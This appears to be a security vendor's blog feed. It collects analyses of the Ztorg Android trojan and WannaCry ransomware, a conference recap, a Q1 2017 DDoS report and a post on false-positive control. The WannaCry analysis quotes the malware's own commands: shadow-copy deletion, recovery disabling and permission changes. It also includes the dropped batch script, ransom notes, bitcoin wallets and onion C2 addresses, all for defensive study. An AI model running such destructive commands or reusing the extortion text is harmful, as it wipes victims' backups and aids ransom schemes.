Native (ELF) malicious modules File Name MD5 Path after infection Detection name data/files/.zog/.am b30c193f98e83b7e6f086bba1e17a9ea /system/xbin/.gasys Backdoor.AndroidOS.Ztorg.j data/files/.zog/.an 41ab20131f53cbb6a0fb69a143f8bc66 /system/lib/ Backdoor.AndroidOS.Ztorg.j data/files/.zog/.b ae822aed22666318c4e01c8bd88ca686 /system/xbin/.gap.a Backdoor.AndroidOS.Ztorg.c data/files/.zog/.k 5289027ca9d4a4ed4663db445d8fc450 /system/bin/debuggerd Backdoor.AndroidOS.Ztorg.c data/files/.zog/.m 5af47875666c9207110c17bc8627ce30 /system/bin/ddexe script data/files/.zog/.c d335ac148f6414f0ce9c30ac63c20482 /system/xbin/.gap Backdoor.AndroidOS.Ztorg.c

All of these files can only be dropped from the Trojan’s body. They are not downloaded.

Malicious apps File Name Name MD5 Path after infection Detection name data/files/.zog/.l mains.apk 87030ae799e72994287c5b37f6675667 /system/priv-app/dpl.apk data/files/.zog/.o mains2.apk 93016a4a82205910df6d5f629a4466e9 /system/priv-app/.gmq.apk Trojan.AndroidOS.Boogr.gsh data/files/.zog/.n mainm.apk 6aad1baf679b42adb55962cdb55fb28c /system/priv-app/.gma.apk Backdoor.AndroidOS.Ztorg.a data/files/.zog/.al .al 7d7247b4a2a0e73aaf8cc1b5c6c08221 /system/priv-app/.gmtgp.apk Trojan.AndroidOS.Hiddad.c .gmtgp.apk (7d7247b4a2a0e73aaf8cc1b5c6c08221)

This app is detected as Trojan.AndroidOS.Hiddad.c. It downloads (from the C&C an additional encrypted module, decrypts and loads it. In my case it downloads Trojan-Clicker.AndroidOS.Gopl.a (af9a75232c83e251dd6ef9cb32c7e2ca).

Its C&C is; additional domains are and

The Trojan uses accessibility services to install (or even buy) apps from the Google Play Store.

It also downloads apps into the .googleplay_download directory on the SD card and installs them using accessibility services to click buttons. The folder .googleplay_download is one of the sources used to spread the Ztorg Trojan. It can click buttons that use one of 13 languages – English, Spanish, Arabic, Hindi, Indonesian, French, Persian, Russian, Portuguese, Thai, Vietnamese, Turkish and Malay.

dpl.apk (87030AE799E72994287C5B37F6675667)

This module contains the same methods to detect emulators, sandbox and virtual machines as in the original infected module.

It downloads an encrypted file from the C&C into the file /.androidsgqmdata/isgqm.jar. After decryption, the Trojan loads this file.

The main purpose of dpl.apk is to download and install apps. It receives commands from the following C&Cs:


The module downloads them into the DownloadProvider directory on the SD card. This folder is one of the sources used to distribute the Ztorg Trojan.

In my case, it downloaded five malicious APKs; four of them were installed and listed in the Installed apps section.

.gma.apk (6AAD1BAF679B42ADB55962CDB55FB28C)

This Trojan tries to download the additional isgqm.jar module with the main functionality in the same way as the other modules. Unfortunately, its C&Cs (,,, didn’t return any commands, so I don’t know the main purpose of this app.

This app can modify /system/etc/, and download files to the /.androidgp/ folder on the SD card. These files will be installed in the system folders (/system/app/ or /system/priv-app/).

I assume this Trojan is needed to update other modules.

.gmq.apk (93016a4a82205910df6d5f629a4466e9)

This Trojan wasn’t able to download its additional module isgq.jar from the C&Cs (,,

Installed apps

The following apps were silently downloaded and installed on the device after infection. All of them have some well-known ad services.

Package Name Detection Md5 Ad modules co.uhi.tadsafa Trojan-Downloader.AndroidOS.Rootnik.g d1ffea3d2157ede4dcc029fb2e1c3607 mobvista, batmobi com.friend.booster 5c99758c8622339bffddb83af39b8685 mobvista, batmobi sq.bnq.gkq Trojan-Downloader.AndroidOS.Rootnik.g 10272af66ab81ec359125628839986ae mobvista, batmobi 8572aec28df317cd840d837e73b2554a mobvista

They also have malicious modules that start downloading ads and apps when commanded by their C&C.

But using clean advertising networks like Mobvista and Batmobi creates an ad recursion, because these ads were used to distribute the original infected app.

A few new folders appear on the SD card after a successful infection. Among them:

  • .googleplay_download
  • .nativedroid
  • .sysAndroid
  • DownloadProvider

All of these folders were used by some of the malware to spread the initial Ztorg infection and were used after infection to distribute other apps – some of them malicious.

Other Trojans

Despite the fact that almost every Trojan from Google Play found during this research had one of the three malicious modules described in this research, there were also a few other Trojans.

One of them, called Money Converter (com.countrys.converter.currency, 55366B684CE62AB7954C74269868CD91), had been installed more than 10,000 times from Google Play. Its purpose is similar to that of the .gmtgp.apk module – it uses Accessibility Services to install apps from Google Play. Therefore, the Trojan can silently install and run promoted apps without any interaction with the user, even on updated devices where it cannot gain root rights.

It used the same command and control servers as .gmtgp.apk.


During the research period I found that Trojan.AndroidOS.Ztorg was uploaded to Google Play Store almost 100 times as different apps. The first of them was called Privacy Lock, had more than 1 million installations and was uploaded in mid-December 2015. Every month after I started tracking this Trojan in September 2016 I was able to find and report at least three new infected apps on Google Play. The most recent apps that I found were uploaded in April 2017, but I’m sure there will be more soon.

All of these apps were popular. Furthermore, their popularity grew very fast, with tens of thousands of new users sometimes being infected each day.

I found out that these Trojans were actively distributed through advertising networks. All these malicious campaigns contained the same URL, which allows me to easily track down any new infected apps.

I was surprised that these Trojans were distributed through apps that were paying users for installing promoted apps. It turned out that some users got paid a few US cents for infecting their device, though they didn’t know it was being infected.

Another interesting thing about the distribution of this Trojan is that after infection it used some of the advertising networks to show infected users ads about installing promoted apps. It creates a kind of ad recursion on infected devices – they become infected because of a malicious ad from an advertising network and after infection they see ads from the same advertising network because of the Trojan and its modules.

Cybercriminals were able to publish infected apps on Google Play because of the numerous techniques they used to bypass detection. They continued to develop and use new features in their Trojans all the time. This Trojan has modular architecture and it uses several modules with different functionality and each of them can be updated via the Internet. During infection Ztorg uses several local root exploit packs to gain root rights on a device. Using these rights allows the Trojan to achieve persistence on the device and deliver ads more aggressively.

BSides Denver 2017

Malware Alerts - Sat, 05/13/2017 - 17:38

Everyone loves a decent security conference, and BSides Denver provides one with space to breathe. Folks in sunny Colorado looking for a fine local gathering found talks on advanced social engineering, APT herding, securing smart cities and more.

Even though BSides got its start as an “open source” event taking its contributors from rejected Black Hat talks, this isn’t the island of misfit toys. Quality content is delivered at all of them. Here is Mandiant’s Hunter Hardman talking advanced social engineering techniques he tends to shun, opting for email available and helpful soft Marketing and HR targets. Discussion afterwards broke out about the value of breakout news stories during red team projects, like the current political environment’s effect on employee healthcare plans in the US.

Kyle Chambers from municpal energy provider Austin Energy presented ideas and thoughts on smart city implementations, audits, smart meters and data collection, and real world integration experiences.

Considering the issues with IoT implementations and the immaturity of development cycles in the IoT space, along with the true nature of the risk involved, it’s a particularly alarming topic. And it’s great to see it being carefully discussed by organizations like Austin Energy.

Hope to see you at BSides Denver 2018!

WannaCry ransomware used in widespread attacks all over the world

Malware Alerts - Fri, 05/12/2017 - 13:30

Earlier today, our products detected and successfully blocked a large number of ransomware attacks around the world. In these attacks, data is encrypted with the extension “.WCRY” added to the filenames.

Our analysis indicates the attack, dubbed “WannaCry”, is initiated through an SMBv2 remote code execution in Microsoft Windows. This exploit (codenamed “EternalBlue”) has been made available on the internet through the Shadowbrokers dump on April 14th, 2017 and patched by Microsoft on March 14.

Unfortunately, it appears that many organizations have not yet installed the patch.


A few hours ago, Spain’s Computer Emergency Response Team CCN-CERT, posted an alert on their site about a massive ransomware attack affecting several Spanish organizations. The alert recommends the installation of updates in the Microsoft March 2017 Security Bulletin as a means of stopping the spread of the attack.

The National Health Service (NHS) in the U.K. also issued an alert and confirmed infections at 16 medical institutions. We have confirmed additional infections in several additional countries, including Russia, Ukraine, and India.

It’s important to understand that while unpatched Windows computers exposing their SMB services can be remotely attacked with the “EternalBlue” exploit and infected by the WannaCry ransomware, the lack of existence of this vulnerability doesn’t really prevent the ransomware component from working. Nevertheless, the presence of this vulnerability appears to be the most significant factor that caused the outbreak.

CCN-CERT alert (in Spanish)

Analysis of the attack

Currently, we have recorded more than 45,000 attacks of the WannaCry ransomware in 74 countries around the world, mostly in Russia. It’s important to note that our visibility may be limited and incomplete and the range of targets and victims is likely much, much higher.

Geographical target distribution according to our telemetry for the first few hours of the attack

The malware used in the attacks encrypts the files and also drops and executes a decryptor tool. The request for $600 in Bitcoin is displayed along with the wallet. It’s interesting that the initial request in this sample is for $600 USD, as the first five payments to that wallet is approximately $300 USD. It suggests that the group is increasing the ransom demands.

The tool was designed to address users of multiple countries, with translated messages in different languages.

Language list that the malware supports

Note that the “payment will be raised” after a specific countdown, along with another display raising urgency to pay up, threatening that the user will completely lose their files after the set timeout. Not all ransomware provides this timer countdown.

To make sure that the user doesn’t miss the warning, the tool changes the user’s wallpaper with instructions on how to find the decryptor tool dropped by the malware.

An image used to replace user’s wallpaper

Malware samples contain no reference to any specific culture or codepage other than universal English and Latin codepage CP1252. The files contain version info stolen from random Microsoft Windows 7 system tools:

Properties of malware files used by WannaCry

For convenient bitcoin payments, the malware directs to a page with a QR code at btcfrog, which links to their main bitcoin wallet 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94. Image metadata does not provide any additional info:

One of the Bitcoin wallets used by the attackers: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

One of the attacker wallets received 0.88 BTC during the last hours

Another Bitcoin wallets included in the attackers’ “readme.txt” from the samples are:
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn – 0.32 BTC

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw – 0.16 BTC

For command and control, the malware extracts and uses Tor service executable with all necessary dependencies to access the Tor network:

A list of dropped files related to Tor service

In terms of targeted files, the ransomware encrypts files with the following extensions:

.der, .pfx, .key, .crt, .csr, .p12, .pem, .odt, .ott, .sxw, .stw, .uot, .3ds, .max, .3dm, .ods, .ots, .sxc, .stc, .dif, .slk, .wb2, .odp, .otp, .sxd, .std, .uop, .odg, .otg, .sxm, .mml, .lay, .lay6, .asc, .sqlite3, .sqlitedb, .sql, .accdb, .mdb, .dbf, .odb, .frm, .myd, .myi, .ibd, .mdf, .ldf, .sln, .suo, .cpp, .pas, .asm, .cmd, .bat, .ps1, .vbs, .dip, .dch, .sch, .brd, .jsp, .php, .asp, .java, .jar, .class, .mp3, .wav, .swf, .fla, .wmv, .mpg, .vob, .mpeg, .asf, .avi, .mov, .mp4, .3gp, .mkv, .3g2, .flv, .wma, .mid, .m3u, .m4u, .djvu, .svg, .psd, .nef, .tiff, .tif, .cgm, .raw, .gif, .png, .bmp, .jpg, .jpeg, .vcd, .iso, .backup, .zip, .rar, .tgz, .tar, .bak, .tbk, .bz2, .PAQ, .ARC, .aes, .gpg, .vmx, .vmdk, .vdi, .sldm, .sldx, .sti, .sxi, .602, .hwp, .snt, .onetoc2, .dwg, .pdf, .wk1, .wks, .123, .rtf, .csv, .txt, .vsdx, .vsd, .edb, .eml, .msg, .ost, .pst, .potm, .potx, .ppam, .ppsx, .ppsm, .pps, .pot, .pptm, .pptx, .ppt, .xltm, .xltx, .xlc, .xlm, .xlt, .xlw, .xlsb, .xlsm, .xlsx, .xls, .dotx, .dotm, .dot, .docm, .docb, .docx, .doc

The file extensions that the malware is targeting contain certain clusters of formats including:

  1. Commonly used office file extensions (.ppt, .doc, .docx, .xlsx, .sxi).
  2. Less common and nation-specific office formats (.sxw, .odt, .hwp).
  3. Archives, media files (.zip, .rar, .tar, .bz2, .mp4, .mkv)
  4. Emails and email databases (.eml, .msg, .ost, .pst, .edb).
  5. Database files (.sql, .accdb, .mdb, .dbf, .odb, .myd).
  6. Developers’ sourcecode and project files (.php, .java, .cpp, .pas, .asm).
  7. Encryption keys and certificates (.key, .pfx, .pem, .p12, .csr, .gpg, .aes).
  8. Graphic designers, artists and photographers files (.vsd, .odg, .raw, .nef, .svg, .psd).
  9. Virtual machine files (.vmx, .vmdk, .vdi).

The WannaCry dropper drops multiple “user manuals” on different languages:

Bulgarian, Chinese (simplified), Chinese (traditional), Croatian, Czech, Danish, Dutch, English, Filipino, Finnish, French, German, Greek, Indonesian, Italian, Japanese, Korean, Latvian, Norwegian, Polish, Portuguese, Romanian, Russian, Slovak, Spanish, Swedish, Turkish, Vietnamese

The example of a “user manual” in English:

What Happened to My Computer?
Your important files are encrypted.
Many of your documents, photos, videos, databases and other files are no longer accessible because they have been encrypted. Maybe you are busy looking for a way to
recover your files, but do not waste your time. Nobody can recover your files without our decryption service.

Can I Recover My Files?
Sure. We guarantee that you can recover all your files safely and easily. But you have not so enough time.
You can decrypt some of your files for free. Try now by clicking .
But if you want to decrypt all your files, you need to pay.
You only have 3 days to submit the payment. After that the price will be doubled.
Also, if you don't pay in 7 days, you won't be able to recover your files forever.
We will have free events for users who are so poor that they couldn't pay in 6 months.

How Do I Pay?
Payment is accepted in Bitcoin only. For more information, click .
Please check the current price of Bitcoin and buy some bitcoins. For more information, click .
And send the correct amount to the address specified in this window.
After your payment, click . Best time to check: 9:00am - 11:00am GMT from Monday to Friday.
Once the payment is checked, you can start decrypting your files immediately.

If you need our assistance, send a message by clicking .

We strongly recommend you to not remove this software, and disable your anti-virus for a while, until you pay and the payment gets processed. If your anti-virus gets
updated and removes this software automatically, it will not be able to recover your files even if you pay!

It also drops batch and VBS script files, and a “readme” (contents are provided in the appendix).

Just in case the user closed out the bright red dialog box, or doesn’t understand it, the attackers drop a text file to disk with further instruction. An example of their “readme” dropped to disk as “@Please_Read_Me@.txt” to many directories on the victim host. Note that the English written here is done well, with the exception of “How can I trust?”. To date, only two transactions appear to have been made with this 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn bitcoin address for almost $300:

Q: What's wrong with my files?

A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!

Q: What do I do?

A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)

Q: How can I trust?

A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.

* If you need our assistance, send a message by clicking on the decryptor window.

Once started it immediately spawns several processes to change file permissions and communicate with tor hidden c2 servers:

  • attrib +h .
  • icacls . /grant Everyone:F /T /C /Q
  • C:\Users\xxx\AppData\Local\Temp\taskdl.exe
  • @WanaDecryptor@.exe fi
  • 300921484251324.bat
  • C:\Users\xxx\AppData\Local\Temp\taskdl.exe
  • C:\Users\xxx\AppData\Local\Temp\taskdl.exe

The malware creates mutex “Global\MsWinZonesCacheCounterMutexA” and runs the command:

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

This results in an UAC popup that user may notice.

UAC popup to disable Volume Shadow Service (System Restore)

The malware use TOR hidden services for command and control. The list of .onion domains inside is as following:

  • gx7ekbenv2riucmf.onion
  • 57g7spgrzlojinas.onion
  • Xxlvbrloxvriy2c5.onion
  • 76jdd2ir2embyv47.onion
  • cwwnhwhlz52maqm7.onion
  • sqjolphimrr7jqw6.onion
Mitigation and detection information

Quite essential in stopping these attacks is the Kaspersky System Watcher component. The System Watcher component has the ability to rollback the changes done by ransomware in the event that a malicious sample managed to bypass other defenses. This is extremely useful in case a ransomware sample slips paste defenses and attempts to encrypt the data on the disk.

System Watcher blocking the WannaCry attacks

Mitigation recommendations:

  1. Make sure that all hosts are running and have enabled endpoint security solutions.
  2. Install the official patch (MS17-010) from Microsoft, which closes the affected SMB Server vulnerability used in this attack.
  3. Ensure that Kaspersky Lab products have the System Watcher component enabled.
  4. Scan all systems. After detecting the malware attack as MEM:Trojan.Win64.EquationDrug.gen, reboot the system. Once again, make sure MS17-010 patches are installed.

Samples observed in attacks so far:


Kaspersky Lab detection names:


Kaspersky Lab experts are currently working on the possibility of creating a decryption tool to help victims. We will provide an update when a tool is available.


Batch file

@echo off
echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs
echo SET om = ow.CreateShortcut("C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe.lnk")>> m.vbs

echo om.TargetPath = "C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe">> m.vbs

echo om.Save>> m.vbs
cscript.exe //nologo m.vbs
del m.vbs
del /a %0


SET ow = WScript.CreateObject("WScript.Shell")
SET om = ow.CreateShortcut("C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe.lnk")
om.TargetPath = "C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe"

DDOS attacks in Q1 2017

Malware Alerts - Thu, 05/11/2017 - 05:00

News Overview

Thanks to IoT botnets, DDoS attacks have finally turned from something of a novelty into an everyday occurrence. According to the A10 Networks survey, this year the ‘DDoS of Things’ (DoT) has reached critical mass – in each attack, hundreds of thousands of devices connected to the Internet are being leveraged.

The fight against this phenomenon is just beginning – IoT equipment vendors are extremely slow to strengthen information security measures in their own products. However, certain successes have been achieved in combating attackers behind the DDoS of Things. The well-known info security journalist Brian Krebs managed to identify the author of the infamous IoT malware Mirai. In the UK, the author of an attack on Deutsche Telekom was arrested. According to the charges, he allegedly assembled an IoT botnet from routers in order to sell access to it. He faces up to 10 years in prison in Germany.

Cheaper DoS tools and a growth in their number has caused an inevitable increase in the number of attacks on notable resources. For instance, unknown attackers took down the site of the Austrian Parliament, as well as more than a hundred government servers in Luxembourg. No one took responsibility for the attacks and no demands were made, which may mean the attacks were a test run, or simply hooliganism.

Plans by supporters of the Democratic Party to launch a massive attack on the White House site as a protest against the election of Donald Trump the US president came to nothing – there were no reports of problems with the site. Nevertheless, DDoS attacks have taken root in the US as a type of political protest. Two weeks before the inauguration, the conservative news site Drudge Report, which actively supported Trump during the election campaign, was attacked.

Law enforcement agencies took notice of this alarming trend, and the US Department of Homeland Security eventually stepped in to provide protection from DDoS attacks. The Department declared it aimed to “build effective and easily implemented network defenses and promote adoption of best practices by the private sector” in order “to bring about an end to the scourge of DDoS attacks.”

However, the main goal of the DDoS authors is still to make money. In this respect, banks and broker companies remain the most attractive targets. DDoS attacks are capable of causing such serious material and reputational damage that many organizations prefer to pay the cybercriminals’ ransom demands.

Trends of the quarter

There’s usually a distinct lull in DDoS attacks at the beginning of the year. This may be due to the fact that the people behind these attacks are on vacation, or perhaps there’s less demand from their customers. In any case, this trend has been observed for the last five years – Q1 is off season. The first quarter of this year was no exception: Kaspersky Lab’s DDoS prevention group recorded very low attack activity. This was in stark contrast to the fourth quarter of 2016. However, despite the now habitual downturn, Q1 of 2017 saw more attacks than the first quarter of 2016, which confirms the conclusion that the overall number of DDoS attacks is growing.

Due to the traditional Q1 lull, it’s too early to talk about any trends for 2017; however, a few interesting features are already noticeable:

  1. 1. Over the reporting period, not a single amplification-type attack was registered, although attacks to overload a channel without amplification (using a spoofed IP address) were in constant use. We can assume that amplification attacks are no longer effective and are gradually becoming a thing of the past.

  2. 2. The number of encryption-based attacks has increased, which is in line with last year’s forecasts and current trends. However, this growth cannot as yet be called significant.

As we predicted, complex attacks (application-level attacks, HTTPS) are gaining in popularity. One example was the combined attack (SYN + TCP Connect + HTTP-flood + UDP flood) on the Moscow stock exchange. A distinct feature of this attack was its rare multi-vector nature in combination with relatively low power (3 Gbps). To combat such attacks, it’s necessary to use the latest complex protection mechanisms.

Yet another unusual attack affected the site of the Portuguese police force. A notable feature of this attack was the use of vulnerabilities in reverse proxy servers to generate attack traffic. We assume the cybercriminals were trying to disguise the real source of the attack; and to generate traffic, new types of botnets were used, consisting of vulnerable reverse proxies.

On the whole, Q1 2017 didn’t bring any surprises. In the second quarter, we expect to see a gradual increase in the proportion of distributed attacks. Based on the next quarter’s results, it may be possible to get an idea of what we will face in 2017. For now, we can only guess.

Statistics for botnet-assisted DDoS attacks Methodology

Kaspersky Lab has extensive experience of combating cyber threats, including DDoS attacks of various types and complexity. The company’s experts monitor botnet activity with the help of the DDoS Intelligence system. DDoS Intelligence (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data.

This report contains the DDoS Intelligence statistics for the first quarter of 2017.

In the context of this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours. If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack. Attacks on the same web resource from two different botnets are also regarded as separate attacks.

The geographic distribution of DDoS victims and C&C servers is determined according to their IP addresses. In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics.

It is important to note that DDoS Intelligence statistics are limited to those botnets detected and analyzed by Kaspersky Lab. It should also be noted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.

Q1 Summary
  • Resources in 72 countries (vs. 80 in Q4 2016) were targeted by DDoS attacks in Q1 2017.
  • 47.78% of targeted resources were located in China which is significantly lower than the previous quarter (71.60%).
  • China, South Korea and the US remained leaders in terms of both number of DDoS attacks and number of targets, while the Netherlands replaced China in terms of number of detected servers.
  • The longest DDoS attack in Q1 2017 lasted for 120 hours – 59% shorter than the previous quarter’s maximum (292 hours). A total of 99.8% of attacks lasted less than 50 hours.
  • The proportion of attacks using TCP, UDP and ICMP grew considerably, while the share of SYN DDoS declined from 75.3% in Q4 2016 to 48% in the first quarter of 2017.
  • For the first time in a year, activity by Windows-based botnets has exceeded that of Linux botnets, with their share increasing from 25% last quarter to 59.8% in Q1 2017.
Geography of attacks

In Q1 2017, the geography of DDoS attacks narrowed to 72 countries, with China accounting for 55.11% (21.9 p.p. less than the previous quarter). South Korea (22.41% vs. 7.04% in Q4 2016) and the US (11.37% vs. 7.30%) were second and third respectively.

The Top 10 most targeted countries accounted for 95.5% of all attacks. The UK (0.8%) appeared in the ranking, replacing Japan. Vietnam (0.8%, + 0.2 p.p.) moved up from seventh to sixth, while Canada (0.7%) dropped to eighth.

Distribution of DDoS attacks by country, Q4 2016 vs. Q1 2017

Statistics for the first quarter show that the 10 most targeted countries accounted for 95.1% of all DDoS attacks.

Distribution of unique DDoS attack targets by country, Q4 2016 vs. Q1 2017

Similar to the ranking for attack numbers, targets in China received much less attention from cybercriminals in Q1 2017 – they accounted for 47.78% of attacks, although China still remained the leader in this respect. In fact, the top three remained unchanged from the previous quarter despite dramatic growth in South Korea’s share (from 9.42% to 26.57%) and that of the US (from 9.06% to 13.80%).

Russia (1.55%) fell from fourth to fifth place, after its share fell by just 0.14 p.p. Hong Kong took its place (+ 0.35 p.p.). Japan and France were replaced in the Top 10 by the Netherlands (0.60%) and the UK (1.11%).

Changes in DDoS attack numbers

In Q1 2017, the number of attacks per day ranged from 86 to 994. Most attacks occurred on 1 January (793 attacks), 18 February (994) and 20 February (771). The quietest days of Q1 were 3 February (86 attacks), 6 February (95), 7 February (96) and 15 March (91). The overall decline in the number of attacks from the end of January to mid-February, as well as the downturn in March, can be attributed to the decrease in activity by the Xor.DDoS bot family, which made a significant contribution to the statistics.

Number of DDoS attacks over time* in Q1 2017

* DDoS attacks may last for several days. In this timeline, the same attack may be counted several times, i.e. one time for each day of its duration.

The distribution of DDoS activity by day of the week saw little change from the previous quarter. Saturday was the busiest day of the week in Q1 for DDoS attacks (16.05% of attacks). Monday remained the quietest day of the week (12.28%).

Distribution of DDoS attack numbers by day of the week, Q4 2016 and Q1 2017

Types and duration of DDoS attacks

In the first quarter of 2017, there was a sharp increase in the number and proportion of TCP DDoS attacks – from 10.36% to 26.62%. The percentage of UDP and ICMP attacks also grew significantly – from 2.19% to 8.71% and from 1.41% to 8.17% respectively. Meanwhile, the quarter saw a considerable decline in the share of SYN DDoS (48.07% vs. 75.33%) and HTTP (from 10.71% to 8.43%) attacks.

The increase in the proportion of TCP attacks was due to greater bot activity by the Yoyo, Drive and Nitol families. The growth in ICMP attacks is the result Yoyo and Darkrai activity. Darkrai bots also began conducting more UDP attacks, which was reflected in the statistics.

Distribution of DDoS attacks by type, Q4 2016 and Q1 2017

In the first quarter of 2017, few attacks lasted more than 100 hours. The biggest proportion of attacks lasted no more than four hours – 82.21%, which was 14.79 p.p. more than in the previous quarter. The percentage of even longer attacks decreased considerably: the share of attacks lasting 50-99 hours accounted for 0.24% (vs. 0.94% in Q4 2016); the share of attacks that lasted 5-9 hours decreased from 19.28% to 8.45%; attacks lasting 10-19 hours fell from 7% to 5.05%. Meanwhile, the proportion of attacks that lasted 20-49 hours grew slightly – by 1 p.p.

The longest DDoS attack in the first quarter lasted for only 120 hours, 172 hours shorter than the previous quarter’s maximum.

Distribution of DDoS attacks by duration (hours), Q4 2016 and Q1 2017

C&C servers and botnet types

In Q1, the highest number of C&C servers was detected in South Korea: the country’s contribution increased from 59.06% in the previous quarter to 66.49%. The US (13.78%) came second, followed by the Netherlands with 3.51%, which replaced China (1.35%) in the Top 3 countries hosting the most C&C servers. The total share of the three leaders accounted for 83.8% of all detected C&C servers.

The Top 10 also saw considerable changes. Japan, Ukraine and Bulgaria left the ranking and were replaced by Hong Kong (1.89%), Romania (1.35%) and Germany (0.81%). Of special note was China’s sharp decline: the country dropped from second place to seventh.

Distribution of botnet C&C servers by country in Q1 2017

The distribution of operating systems changed drastically in Q1: Windows-based DDoS bots surpassed the trendy new IoT bots, accounting for 59.81% of all attacks. This is the result of growing activity by bots belonging to the Yoyo, Drive and Nitol families, all of which were developed for Windows.

Correlation between attacks launched from Windows and Linux botnets, Q4 2016 and Q1 2017

The majority of attacks – 99.6% – were carried out by bots belonging to a single family. Cybercriminals launched attacks using bots from two different families in just 0.4% of cases. Attacks involving bots from three families were negligible.


Although the first quarter of 2017 was rather quiet compared to the previous reporting period, there were a few interesting developments. Despite the growing popularity of IoT botnets, Windows-based bots accounted for 59.81% of all attacks. Meanwhile, complex attacks that can only be repelled with sophisticated protection mechanisms are becoming more frequent.

In Q1 2017, not a single amplification attack was recorded, which suggests that their effectiveness has declined. We can assume that this type of attack is gradually becoming a thing of the past. Another trend evident this quarter is the rise in the number of encryption-based attacks. However, it cannot be described as significant yet.

False Positives: Why Vendors Should Lower Their Rates and How We Achieved the Best Results

Malware Alerts - Wed, 05/10/2017 - 10:14

In pursuit of a high cyberthreat detection rate, the some developers of cybersecurity solutions neglect the subject matter of false positives, and unfairly so. Indeed, this is a very inconvenient matter that some developers tend to overlook (or try to solve with questionable methods) until there is a serious incident that could paralyze the work of their customers. Unfortunately, such incidents do happen. Regretfully, only then does the idea dawn on these developers that high-quality protection from cyberthreats involves not only prevention but also a low false-positive rate.

While the minimizing the false positive rate may seem simple enough, it has, as a matter of fact, a multitude of intricacies and snags that demand significant investments, technological maturity, and resources from cybersecurity developers.

The two main reasons of false positives are:

  1. software, hardware, and human errors that all stem from the developer of the product, and
  2. the diversity of legitimate (“clean”) software that is being inspected.

The latter reason needs to be clarified.

It’s no secret that programs are written globally by millions of people with a plethora of varied qualifications (from students to experts), using various platforms and adhering to different standards. Every author has his own unique style, which sometimes leads to a situation where the program code resembles a malicious code. This triggers protection technologies, especially those that are based upon low-level binary analysis using different approaches including machine learning.

Without taking into account this peculiarity, and without implementing special technologies to minimize the occurrence of false positives, cybersecurity developers risk ignoring the “first, do not harm” principle. This, in its turn, leads to disastrous consequences (especially for large corporate customers), which can be compared to damage caused by cyberattacks.

For more than twenty years, Kaspersky Lab has been working on processes for development and testing as well as on creating technologies that minimize the rate of false positives. We take pride in having one of the best results in the industry (see tests performed by AV-Comparatives, or SE Labs) for false alarms, and we are glad to further expand on several specifics of our inner workings. I am sure that this information will allow users and corporate customers to have a more reasonable approach in selecting a cybersecurity solution. Additionally, cybersecurity developers will be able to improve and refine their processes to match the level of the world’s best practices.

We use a triple-tier quality-control system to minimize the rate of false positives, including:

  1. quality control at the design stage,
  2. quality control upon the release of a detection method, and
  3. quality control of released detection methods.

This system is being continuously improved with the help of various preventive measures.

Let us review each tier of the system in greater detail.

Quality control at the design stage

One of our fundamental principles in software development is that each technology, product, or process must contain mechanisms for minimizing the risk of false positives and consequential faults that result from them. Mistakes at the design stage turn out to be the most costly, as correcting them comprehensively may require rewriting an entire algorithm. This is why, with our years of experience, we have produced our own best practices that have allowed to decrease the rate of false positives.

For example, when developing or improving machine learning-based cyberthreat detection technology, we make sure that the technology has been learning from considerable collections of clean files with different formats. Our knowledge base for clean files (a whitelist) assists us with that. The contents of the whitelist have already exceeded 2 billion objects and are constantly collaboratively updated.

During our work, we also make sure that training and test collections of each technology are regularly updated with the most recent versions of clean files. Additionally, our products contain built-in features that minimize false positives for critical system files. Aside from that, at each detection, the product utilizes the Kaspersky Security Network (KSN) to consult the whitelist database and the certificate-reputation service to confirm that the detected file is not a clean one.

However, technologies and products aside, there is also a human factor.

A cybersecurity analyst, a developer of an expert system, or a data analyst might make mistakes at any stage. So, there is room for miscellaneous blocking checks by additional automated systems.

Quality control at the release of a detection method

Before the delivery to users, new methods of cyberthreat detection pass several more test stages.

The greatest protective barrier is the infrastructure system for false positive testing, which works with two collections.

The first collection, which is a critical set, comprises files that are taken from popular operating systems (released for different platforms with different localizations), updates of those systems, office applications, drivers, and our own products. This set of files is routinely supplemented.

The second collection contains a dynamically formed set of files, which includes the most popular files. The size of this collection is chosen by finding a balance between the volume of scanned files (as a consequence, the number of servers), the run time of this scan (hence, the time of delivery of detection methods to users), and the number of potentially affected computers in case of a false positive.

For the time being, the number of files in both collections surpasses 120 million (this is approximately 50 TB of data). Considering the fact that these files are scanned every hour after each release of the database updates, we may infer that the infrastructure checks over 1.2 PB of data for false positives each day.

More than 10 years ago, we were among the first ones in the field of cybersecurity to implement non-signature-based methods of detection that leveraged behavioral analysis, machine learning, and other promising generic technologies. These methods have proven their effectiveness, especially in overcoming sophisticated cyberthreats. However, they require particularly thorough testing for false positives.

For example, behavioral detection allows for the neutralization of a malicious application that has manifested some traits of a malicious behavior during its operation. In order to prevent a false positive for the behavior of clean files, we have created a “farm” of computers, which bring about various user scenarios.

